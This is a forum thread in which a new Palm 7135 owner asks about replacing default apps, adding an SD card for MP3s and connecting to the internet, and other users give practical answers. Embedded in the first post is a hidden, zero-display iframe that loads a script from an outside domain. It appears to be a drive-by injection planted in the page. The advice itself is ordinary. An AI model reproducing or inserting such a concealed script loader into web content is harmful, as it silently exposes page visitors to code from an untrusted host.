I got my 7135 adore it but a few things

A few quick questions This phone is awesome out of the box, but what I wanted to know is before I get used to, am I going to want to replace most of the applications that are defaulted in there at some point ?

Would I delete all the default address book and memo and what not if I added new programs

Do i need an addon card to add on for instance other aps such as a better mp3 player and stuff ?

Any other immediate tricks and tips to do right away. I`ve already used the memo address book and that stuff its great.

Anything i need to do to connect to internet other than hit connect any other tips for that ?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You willl probably want to add other apps, depending on how you use the Palm. There are quite a few good discussions on this Board about various applications., e.g TakePhone to replace the default adress book.

No, you just add the new apps, which often work with the default app. In fact, you cannot delete the default applications like Memo and the address book.

A SD card will allow you to greatly expand the number of programs and files you can have on the Palm. You pretty much have to have a card if you are going to play MP3s since they will take up a lot of space. Some applications run well off the SD card, while others do not. There is an app that allow you to run most other programs off the SD card. Check out this FAQ http://www.smartphonesource.com/vbul...&threadid=5007

There are a lot of tricks and tips on this board, so it is hard to know where to begin. It probably pays for you to poke around here for awhile and see what you find.

Hope this helps.

FYI: And even if you get DateBK5 to replace your default AddressBook, you should NOT delete AddressBook, because DateBK5 actually uses AddressBook as its database. So it can't work if the original one is gone.

Good point, Markito. I should have made that clear.
